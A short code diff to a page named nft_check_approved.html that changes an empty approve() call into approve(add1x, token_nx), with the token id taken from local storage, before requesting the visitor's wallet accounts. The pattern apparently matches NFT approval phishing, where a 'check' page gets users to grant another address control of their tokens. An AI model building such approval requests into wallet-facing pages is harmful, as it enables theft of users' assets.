--- a/nft_check_approved.html
+++ b/nft_check_approved.html
@@ -645,7 +645,7 @@ var acct = (async function(){
 	var token_nx = localStorage.getItem("mySharedData1");
 	
  	
-        var _data = new web3.eth.Contract(abi, contract_address).methods.approve().encodeABI();
+        var _data = new web3.eth.Contract(abi, contract_address).methods.approve(add1x, token_nx).encodeABI();
         const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
         const account = accounts[0];
 	const result = await web3.eth.getTransactionCount(account)
